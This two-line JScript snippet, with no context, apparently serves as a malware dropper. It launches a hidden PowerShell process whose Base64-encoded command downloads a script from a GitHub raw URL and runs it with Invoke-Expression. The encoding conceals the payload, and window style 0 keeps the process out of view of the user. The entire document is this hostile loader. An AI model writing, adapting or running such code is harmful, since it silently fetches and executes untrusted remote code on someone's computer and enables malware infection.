c = "cmd /c powershell.exe -enc SQBFAFgAIAAoAGkAdwByACAAIgBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAE0ANgByADEAMAAvAGwAZQBnAGUAbgBkAGEAcgB5AC8AbQBhAHMAdABlAHIALwBJAEUAMgAiACkA";
r = new ActiveXObject("WScript.Shell").Run(c,0,true);
